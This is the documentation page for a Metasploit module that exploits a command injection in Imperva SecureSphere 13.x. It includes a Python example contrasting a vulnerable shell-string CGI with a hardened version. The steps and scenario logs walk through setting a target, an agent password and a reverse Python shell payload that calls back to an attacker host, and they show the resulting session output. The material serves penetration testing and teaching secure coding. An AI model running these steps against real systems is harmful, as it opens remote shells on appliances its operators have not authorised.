metasploit-gs/documentation/modules/exploit/linux/http/imperva_securesphere_exec.md
2019-01-07 22:18:04 -08:00

Description

This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where the Python CGIs do not properly sanitize user-supplied command parameters and pass them directly to the corresponding CLI utility, leading to command injection. An agent registration credential is required to exploit SecureSphere in gateway mode; in pre-FTL mode no credential is needed.
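The bug class described above, as an added example that is not code from the module or from the SecureSphere product: a hypothetical CGI handler that splices a user-supplied parameter into a shell command string, beside the hardened form that passes an argv list (no shell) and allowlists the parameter first. The utility path `/bin/echo`, the `--host` flag and the parameter name are assumptions standing in for the real CLI utility, which the page does not name.

```python
import re
import subprocess

# Hypothetical CLI utility wrapped by the CGI; constructed for this example
# (the real SecureSphere utility and its flags are not on the page).
CLI = "/bin/echo"


def vulnerable_command(hostname: str) -> str:
    """Vulnerable pattern: the user-controlled value is concatenated into a
    single shell string, so metacharacters (; | $() etc.) are honoured."""
    return f"{CLI} --host {hostname}"


def run_vulnerable(hostname: str) -> str:
    """Runs the concatenated string through a shell; an attacker-controlled
    'hostname' such as 'a.example; id' executes a second command."""
    result = subprocess.run(
        vulnerable_command(hostname),
        shell=True,
        capture_output=True,
        text=True,
    )
    return result.stdout


# Layer 1 of the fix: never build a shell string; pass argv so the kernel
# execs the utility directly and no shell parses the parameter.
def argv_only(hostname: str) -> list:
    return [CLI, "--host", hostname]


def run_argv_only(hostname: str) -> str:
    result = subprocess.run(
        argv_only(hostname),
        shell=False,
        capture_output=True,
        text=True,
    )
    return result.stdout


# Layer 2 of the fix: validate the parameter against an allowlist of what a
# hostname may contain before it reaches the utility at all. The utility
# itself may still treat a leading '-' as an option, so the pattern forbids it.
HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})$")


def hardened_argv(hostname: str) -> list:
    """Hardened handler: allowlist validation plus argv execution."""
    if not HOST_RE.fullmatch(hostname):
        raise ValueError("rejected hostname parameter")
    return [CLI, "--host", hostname]


def run_hardened(hostname: str) -> str:
    result = subprocess.run(
        hardened_argv(hostname),
        shell=False,
        capture_output=True,
        text=True,
    )
    return result.stdout


if __name__ == "__main__":
    # Constructed attacker input: a valid-looking hostname followed by an
    # injected command.
    evil = "a.example; echo INJECTED"
    print("vulnerable :", repr(run_vulnerable(evil)))   # two lines: 2nd is INJECTED
    print("argv only  :", repr(run_argv_only(evil)))    # one line, ';' is literal
    try:
        run_hardened(evil)
    except ValueError as exc:
        print("hardened   : rejected ->", exc)
```

Both layers matter: the argv form alone stops the shell from interpreting the parameter, but the allowlist is what stops the value from being abused as an unexpected option or argument of the utility itself.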

Vulnerable Application

Imperva SecureSphere 13.0/13.1/13.2

Verification Steps

  1. use exploit/linux/http/imperva_securesphere_exec
  2. set RHOSTS [TARGET IP]
  3. set PASS [Agent registration password] if the target has been set to gateway mode
  4. Run check
  5. Verify that the result is "The target is vulnerable."
  6. set payload cmd/unix/reverse_python
  7. set LHOST [IP]
  8. Run exploit
  9. Verify that a reverse shell is obtained (the session runs as the lighttpd user, not root)

Scenarios

Imperva SecureSphere 13.0 Pre-FTL mode (no credential required):

msf5 > use exploit/linux/http/imperva_securesphere_exec
msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOSTS 192.168.146.201
RHOSTS => 192.168.146.201
msf5 exploit(linux/http/imperva_securesphere_exec) > check
[+] 192.168.146.201:443 The target is vulnerable.
msf5 exploit(linux/http/imperva_securesphere_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
LHOST => 192.168.146.215
msf5 exploit(linux/http/imperva_securesphere_exec) > exploit

[*] Started reverse TCP handler on 192.168.146.215:4444
[*] Sending payload cmd/unix/reverse_python

uname -a
Linux localhost 2.6.32-279.el6.imp8.numa.x86_64 #1 SMP Sun Nov 5 16:18:35 IST 2017 x86_64 x86_64 x86_64 GNU/Linux
id
uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
/sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:DE:50:99
          inet addr:192.168.146.201  Bcast:192.168.146.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:855 errors:0 dropped:0 overruns:0 frame:0
          TX packets:566 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:94180 (91.9 KiB)  TX bytes:198152 (193.5 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential):

msf5 > use exploit/linux/http/imperva_securesphere_exec
msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOSTS 192.168.146.201
RHOSTS => 192.168.146.201
msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS
PASS => lshy5782%lsLS
msf5 exploit(linux/http/imperva_securesphere_exec) > check
[+] 192.168.146.201:443 The target is vulnerable.
msf5 exploit(linux/http/imperva_securesphere_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
LHOST => 192.168.146.215
msf5 exploit(linux/http/imperva_securesphere_exec) > exploit

[*] Started reverse TCP handler on 192.168.146.215:4444
[*] Sending payload cmd/unix/reverse_python

uname -a
Linux GW 2.6.32-279.el6.imp8.numa.x86_64 #1 SMP Sun Nov 5 16:18:35 IST 2017 x86_64 x86_64 x86_64 GNU/Linux
id
uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
/sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:DE:50:99
          inet addr:192.168.146.201  Bcast:192.168.146.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:309 errors:0 dropped:0 overruns:0 frame:0
          TX packets:339 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:52168 (50.9 KiB)  TX bytes:56159 (54.8 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:787 errors:0 dropped:0 overruns:0 frame:0
          TX packets:787 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:111598 (108.9 KiB)  TX bytes:111598 (108.9 KiB)